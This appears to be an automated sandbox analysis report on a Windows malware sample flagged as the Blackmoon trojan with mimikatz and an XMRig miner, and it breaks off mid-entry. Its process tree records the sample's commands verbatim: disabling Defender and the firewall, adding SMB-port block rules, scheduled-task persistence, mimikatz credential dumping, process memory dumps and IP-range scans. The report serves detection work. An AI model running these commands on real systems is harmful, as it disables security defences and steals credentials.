Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-09-2024 05:33

General

  • Target

    6194ba78156e7c09e11b1996dc0854d22d4b87a84c905fdf73f52a475e1df939N.exe

  • Size

    8.9MB

  • MD5

    f896f260acb37862f87650f35b7e5360

  • SHA1

    c85326c37dfe177c237798cf0802e0ed0adf3fc4

  • SHA256

    6194ba78156e7c09e11b1996dc0854d22d4b87a84c905fdf73f52a475e1df939

  • SHA512

    368aff407703350fa2a22d1f3877125c948126f082de2492a7df19d77257814828cf6ae7a202181d05260d70b77eb689fd8e44a74f8b4a403b98753a978b5bbd

  • SSDEEP

    98304:TRoeO6XTBJYazImknGzZr+HIPFtmOZ9G17xwFB5URUSKnaSOdroSCa:NoeO6XTYxmknGzwHIPHd9swFBubKT

Malware Config

Signatures

  • Blackmoon, KrBanker

    Blackmoon also known as KrBanker is banking trojan first discovered in early 2014.

  • Detect Blackmoon payload 5 IoCs
  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (40283) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

  • XMRig Miner payload 10 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 5 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 44 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Executes dropped EXE 32 IoCs
  • Loads dropped DLL 12 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Indicator Removal: Clear Persistence 1 TTPs 2 IoCs

    remove IFEO.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

  • Creates a Windows Service
  • Drops file in System32 directory 18 IoCs
  • UPX packed file 40 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 45 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 64 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • NSIS installer 3 IoCs
  • Modifies data under HKEY_USERS 49 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 26 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:2172
      • C:\Windows\TEMP\hsyynrkni\befepm.exe
        "C:\Windows\TEMP\hsyynrkni\befepm.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:4100
    • C:\Users\Admin\AppData\Local\Temp\6194ba78156e7c09e11b1996dc0854d22d4b87a84c905fdf73f52a475e1df939N.exe
      "C:\Users\Admin\AppData\Local\Temp\6194ba78156e7c09e11b1996dc0854d22d4b87a84c905fdf73f52a475e1df939N.exe"
      1⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4956
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\ijeuuiyl\breeume.exe
        2⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:896
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:2624
        • C:\Windows\ijeuuiyl\breeume.exe
          C:\Windows\ijeuuiyl\breeume.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:2328
    • C:\Windows\ijeuuiyl\breeume.exe
      C:\Windows\ijeuuiyl\breeume.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Indicator Removal: Clear Persistence
      • Drops file in System32 directory
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3708
      • C:\Windows\ijeuuiyl\gjtxxyzstnnhibq29592.exe
        C:\Windows\ijeuuiyl\gjtxxyzstnnhibq29592.exe
        2⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        PID:4172
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4192
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:1096
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D users
          3⤵
          • System Location Discovery: System Language Discovery
          PID:1832
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:3936
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
            3⤵
              PID:3384
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
              • System Location Discovery: System Language Discovery
              PID:4532
            • C:\Windows\SysWOW64\cacls.exe
              cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
              3⤵
              • System Location Discovery: System Language Discovery
              PID:4332
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static delete all
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:264
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add policy name=Bastards description=FuckingBastards
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:2656
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filteraction name=BastardsList action=block
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:1840
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ujbeeisls" /ru system /tr "cmd /c C:\Windows\Fonts\breeume.exe"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:3064
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
              • System Location Discovery: System Language Discovery
              PID:3316
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /sc minute /mo 1 /tn "ujbeeisls" /ru system /tr "cmd /c C:\Windows\Fonts\breeume.exe"
              3⤵
              • Scheduled Task/Job: Scheduled Task
              PID:508
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:3760
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:3360
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            PID:1300
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static set policy name=Bastards assign=y
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            PID:4572
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            PID:3388
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
            2⤵
            • System Location Discovery: System Language Discovery
            PID:1560
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:3780
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static set policy name=Bastards assign=y
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:3632
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            PID:1468
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:424
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Location Discovery: System Language Discovery
            PID:4412
          • C:\Windows\SysWOW64\netsh.exe
            netsh ipsec static set policy name=Bastards assign=y
            2⤵
            • Event Triggered Execution: Netsh Helper DLL
            PID:404
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c net stop SharedAccess
            2⤵
            • System Location Discovery: System Language Discovery
            PID:556
            • C:\Windows\SysWOW64\net.exe
              net stop SharedAccess
              3⤵
              • System Location Discovery: System Language Discovery
              PID:4632
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop SharedAccess
                4⤵
                  PID:1424
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c netsh firewall set opmode mode=disable
              2⤵
              • System Location Discovery: System Language Discovery
              PID:1052
              • C:\Windows\SysWOW64\netsh.exe
                netsh firewall set opmode mode=disable
                3⤵
                • Modifies Windows Firewall
                • Event Triggered Execution: Netsh Helper DLL
                PID:4556
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c netsh Advfirewall set allprofiles state off
              2⤵
                PID:4108
                • C:\Windows\SysWOW64\netsh.exe
                  netsh Advfirewall set allprofiles state off
                  3⤵
                  • Modifies Windows Firewall
                  • Event Triggered Execution: Netsh Helper DLL
                  • System Location Discovery: System Language Discovery
                  PID:2568
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c net stop MpsSvc
                2⤵
                • System Location Discovery: System Language Discovery
                PID:864
                • C:\Windows\SysWOW64\net.exe
                  net stop MpsSvc
                  3⤵
                    PID:3584
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop MpsSvc
                      4⤵
                      • System Location Discovery: System Language Discovery
                      PID:1228
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c net stop WinDefend
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:3308
                  • C:\Windows\SysWOW64\net.exe
                    net stop WinDefend
                    3⤵
                    • System Location Discovery: System Language Discovery
                    PID:3384
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 stop WinDefend
                      4⤵
                        PID:956
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c net stop wuauserv
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:4292
                    • C:\Windows\SysWOW64\net.exe
                      net stop wuauserv
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:1820
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 stop wuauserv
                        4⤵
                          PID:4196
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c sc config MpsSvc start= disabled
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:3712
                      • C:\Windows\SysWOW64\sc.exe
                        sc config MpsSvc start= disabled
                        3⤵
                        • Launches sc.exe
                        PID:4176
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c sc config SharedAccess start= disabled
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:1900
                      • C:\Windows\SysWOW64\sc.exe
                        sc config SharedAccess start= disabled
                        3⤵
                        • Launches sc.exe
                        • System Location Discovery: System Language Discovery
                        PID:1120
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c sc config WinDefend start= disabled
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:5024
                      • C:\Windows\SysWOW64\sc.exe
                        sc config WinDefend start= disabled
                        3⤵
                        • Launches sc.exe
                        • System Location Discovery: System Language Discovery
                        PID:4124
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c sc config wuauserv start= disabled
                      2⤵
                        PID:3260
                        • C:\Windows\SysWOW64\sc.exe
                          sc config wuauserv start= disabled
                          3⤵
                          • Launches sc.exe
                          PID:2788
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c C:\Windows\rfhlysbba\ncazlirev\wpcap.exe /S
                        2⤵
                        • System Location Discovery: System Language Discovery
                        PID:3232
                        • C:\Windows\rfhlysbba\ncazlirev\wpcap.exe
                          C:\Windows\rfhlysbba\ncazlirev\wpcap.exe /S
                          3⤵
                          • Drops file in Drivers directory
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Drops file in System32 directory
                          • Drops file in Program Files directory
                          • System Location Discovery: System Language Discovery
                          PID:3356
                          • C:\Windows\SysWOW64\net.exe
                            net stop "Boundary Meter"
                            4⤵
                              PID:1708
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop "Boundary Meter"
                                5⤵
                                • System Location Discovery: System Language Discovery
                                PID:3392
                            • C:\Windows\SysWOW64\net.exe
                              net stop "TrueSight Meter"
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:4808
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop "TrueSight Meter"
                                5⤵
                                • System Location Discovery: System Language Discovery
                                PID:1744
                            • C:\Windows\SysWOW64\net.exe
                              net stop npf
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:4540
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop npf
                                5⤵
                                  PID:5100
                              • C:\Windows\SysWOW64\net.exe
                                net start npf
                                4⤵
                                • System Location Discovery: System Language Discovery
                                PID:5048
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 start npf
                                  5⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4424
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c net start npf
                            2⤵
                            • System Location Discovery: System Language Discovery
                            PID:2476
                            • C:\Windows\SysWOW64\net.exe
                              net start npf
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:644
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 start npf
                                4⤵
                                  PID:872
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c net start npf
                              2⤵
                                PID:1480
                                • C:\Windows\SysWOW64\net.exe
                                  net start npf
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:3092
                                  • C:\Windows\SysWOW64\net1.exe
                                    C:\Windows\system32\net1 start npf
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:424
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd /c C:\Windows\rfhlysbba\ncazlirev\gajbukuil.exe -p 80,3389 222.186.55.1-222.186.155.255 --rate=1024 -oJ C:\Windows\rfhlysbba\ncazlirev\Scantest.txt
                                2⤵
                                  PID:1544
                                  • C:\Windows\rfhlysbba\ncazlirev\gajbukuil.exe
                                    C:\Windows\rfhlysbba\ncazlirev\gajbukuil.exe -p 80,3389 222.186.55.1-222.186.155.255 --rate=1024 -oJ C:\Windows\rfhlysbba\ncazlirev\Scantest.txt
                                    3⤵
                                    • Executes dropped EXE
                                    • Loads dropped DLL
                                    • System Location Discovery: System Language Discovery
                                    PID:632
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c C:\Windows\rfhlysbba\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\rfhlysbba\Corporate\log.txt
                                  2⤵
                                  • Drops file in Windows directory
                                  PID:4648
                                  • C:\Windows\rfhlysbba\Corporate\vfshost.exe
                                    C:\Windows\rfhlysbba\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                                    3⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3644
                                • C:\Windows\TEMP\amydesk.exe
                                  C:\Windows\TEMP\amydesk.exe
                                  2⤵
                                  • Executes dropped EXE
                                  • Drops file in System32 directory
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of SetWindowsHookEx
                                  PID:1660
                                • C:\Windows\TEMP\rfhlysbba\mjetabbur.exe
                                  C:\Windows\TEMP\rfhlysbba\mjetabbur.exe -accepteula -mp 440 C:\Windows\TEMP\rfhlysbba\440.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3432
                                • C:\Windows\TEMP\rfhlysbba\mjetabbur.exe
                                  C:\Windows\TEMP\rfhlysbba\mjetabbur.exe -accepteula -mp 520 C:\Windows\TEMP\rfhlysbba\520.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4552
                                • C:\Windows\TEMP\rfhlysbba\mjetabbur.exe
                                  C:\Windows\TEMP\rfhlysbba\mjetabbur.exe -accepteula -mp 528 C:\Windows\TEMP\rfhlysbba\528.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4172
                                • C:\Windows\TEMP\rfhlysbba\mjetabbur.exe
                                  C:\Windows\TEMP\rfhlysbba\mjetabbur.exe -accepteula -mp 660 C:\Windows\TEMP\rfhlysbba\660.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3124
                                • C:\Windows\TEMP\rfhlysbba\mjetabbur.exe
                                  C:\Windows\TEMP\rfhlysbba\mjetabbur.exe -accepteula -mp 776 C:\Windows\TEMP\rfhlysbba\776.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1712
                                • C:\Windows\TEMP\rfhlysbba\mjetabbur.exe
                                  C:\Windows\TEMP\rfhlysbba\mjetabbur.exe -accepteula -mp 784 C:\Windows\TEMP\rfhlysbba\784.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4448
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /c C:\Windows\rfhlysbba\ncazlirev\scan.bat
                                  2⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:900
                                  • C:\Windows\rfhlysbba\ncazlirev\bajrfnijk.exe
                                    bajrfnijk.exe TCP 138.199.0.1 138.199.255.255 807 512 /save
                                    3⤵
                                    • Executes dropped EXE
                                    • Drops file in Windows directory
                                    PID:3716
                                • C:\Windows\TEMP\rfhlysbba\mjetabbur.exe
                                  C:\Windows\TEMP\rfhlysbba\mjetabbur.exe -accepteula -mp 2516 C:\Windows\TEMP\rfhlysbba\2516.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3432
                                • C:\Windows\TEMP\rfhlysbba\mjetabbur.exe
                                  C:\Windows\TEMP\rfhlysbba\mjetabbur.exe -accepteula -mp 2616 C:\Windows\TEMP\rfhlysbba\2616.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5428
                                • C:\Windows\TEMP\rfhlysbba\mjetabbur.exe
                                  C:\Windows\TEMP\rfhlysbba\mjetabbur.exe -accepteula -mp 2776 C:\Windows\TEMP\rfhlysbba\2776.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:6116
                                • C:\Windows\TEMP\rfhlysbba\mjetabbur.exe
                                  C:\Windows\TEMP\rfhlysbba\mjetabbur.exe -accepteula -mp 2972 C:\Windows\TEMP\rfhlysbba\2972.dmp
                                  2⤵
                                  • Executes dropped EXE
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5288
                                • C:\Windows\SysWOW64\netsh.exe
                                  netsh ipsec static delete all
                                  2⤵
                                  • Event Triggered Execution: Netsh Helper DLL
                                  • System Location Discovery: System Language Discovery
                                  PID:5380
                                • C:\Windows\SysWOW64\netsh.exe
                                  netsh ipsec static add policy name=Bastards description=FuckingBastards
                                  2⤵
                                  • Event Triggered Execution: Netsh Helper DLL
                                  • System Location Discovery: System Language Discovery
                                  PID:1480
                                • C:\Windows\SysWOW64\netsh.exe
                                  netsh ipsec static add filteraction name=BastardsList action=block
                                  2⤵
                                  • Event Triggered Execution: Netsh Helper DLL
                                  • System Location Discovery: System Language Discovery
                                  PID:1640
                                • C:\Windows\SysWOW64\netsh.exe
                                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                                  2⤵
                                  • Event Triggered Execution: Netsh Helper DLL
                                  PID:1404
                                • C:\Windows\SysWOW64\netsh.exe
                                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                                  2⤵
                                  • Event Triggered Execution: Netsh Helper DLL
                                  • System Location Discovery: System Language Discovery
                                  PID:4196
                                • C:\Windows\SysWOW64\netsh.exe
                                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                                  2⤵
                                  • Event Triggered Execution: Netsh Helper DLL
                                  PID:1204
                                • C:\Windows\SysWOW64\netsh.exe
                                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                                  2⤵
                                  • Event Triggered Execution: Netsh Helper DLL
                                  PID:1404
                                • C:\Windows\SysWOW64\netsh.exe
                                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                                  2⤵
                                  • Event Triggered Execution: Netsh Helper DLL
                                  • System Location Discovery: System Language Discovery
                                  PID:1792
                                • C:\Windows\SysWOW64\netsh.exe
                                  netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                                  2⤵
                                  • Event Triggered Execution: Netsh Helper DLL
                                  PID:5208
                                • C:\Windows\SysWOW64\netsh.exe
                                  netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                  2⤵
                                  • Event Triggered Execution: Netsh Helper DLL
                                  • System Location Discovery: System Language Discovery
                                  PID:3700
                                • C:\Windows\SysWOW64\netsh.exe
                                  netsh ipsec static set policy name=Bastards assign=y
                                  2⤵
                                  • Event Triggered Execution: Netsh Helper DLL
                                  • System Location Discovery: System Language Discovery
                                  PID:5524
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                  2⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:1960
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:4808
                                  • C:\Windows\SysWOW64\cacls.exe
                                    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1944
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                    3⤵
                                      PID:2928
                                    • C:\Windows\SysWOW64\cacls.exe
                                      cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:4420
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:5296
                                    • C:\Windows\SysWOW64\cacls.exe
                                      cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:4472
                                  • C:\Windows\TEMP\rfhlysbba\mjetabbur.exe
                                    C:\Windows\TEMP\rfhlysbba\mjetabbur.exe -accepteula -mp 3176 C:\Windows\TEMP\rfhlysbba\3176.dmp
                                    2⤵
                                    • Executes dropped EXE
                                    • Modifies data under HKEY_USERS
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4808
                                  • C:\Windows\TEMP\rfhlysbba\mjetabbur.exe
                                    C:\Windows\TEMP\rfhlysbba\mjetabbur.exe -accepteula -mp 3924 C:\Windows\TEMP\rfhlysbba\3924.dmp
                                    2⤵
                                    • Executes dropped EXE
                                    • Modifies data under HKEY_USERS
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:508
                                  • C:\Windows\TEMP\rfhlysbba\mjetabbur.exe
                                    C:\Windows\TEMP\rfhlysbba\mjetabbur.exe -accepteula -mp 3984 C:\Windows\TEMP\rfhlysbba\3984.dmp
                                    2⤵
                                    • Executes dropped EXE
                                    • Modifies data under HKEY_USERS
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5216
                                  • C:\Windows\TEMP\rfhlysbba\mjetabbur.exe
                                    C:\Windows\TEMP\rfhlysbba\mjetabbur.exe -accepteula -mp 4080 C:\Windows\TEMP\rfhlysbba\4080.dmp
                                    2⤵
                                    • Executes dropped EXE
                                    • Modifies data under HKEY_USERS
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1324
                                  • C:\Windows\TEMP\rfhlysbba\mjetabbur.exe
                                    C:\Windows\TEMP\rfhlysbba\mjetabbur.exe -accepteula -mp 4076 C:\Windows\TEMP\rfhlysbba\4076.dmp
                                    2⤵
                                    • Executes dropped EXE
                                    • Modifies data under HKEY_USERS
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4372
                                  • C:\Windows\TEMP\rfhlysbba\mjetabbur.exe
                                    C:\Windows\TEMP\rfhlysbba\mjetabbur.exe -accepteula -mp 4664 C:\Windows\TEMP\rfhlysbba\4664.dmp
                                    2⤵
                                    • Executes dropped EXE
                                    • Modifies data under HKEY_USERS
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:6040
                                  • C:\Windows\TEMP\rfhlysbba\mjetabbur.exe
                                    C:\Windows\TEMP\rfhlysbba\mjetabbur.exe -accepteula -mp 4340 C:\Windows\TEMP\rfhlysbba\4340.dmp
                                    2⤵
                                    • Executes dropped EXE
                                    • Modifies data under HKEY_USERS
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5256
                                  • C:\Windows\TEMP\rfhlysbba\mjetabbur.exe
                                    C:\Windows\TEMP\rfhlysbba\mjetabbur.exe -accepteula -mp 1448 C:\Windows\TEMP\rfhlysbba\1448.dmp
                                    2⤵
                                    • Executes dropped EXE
                                    • Modifies data under HKEY_USERS
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1216
                                  • C:\Windows\TEMP\rfhlysbba\mjetabbur.exe
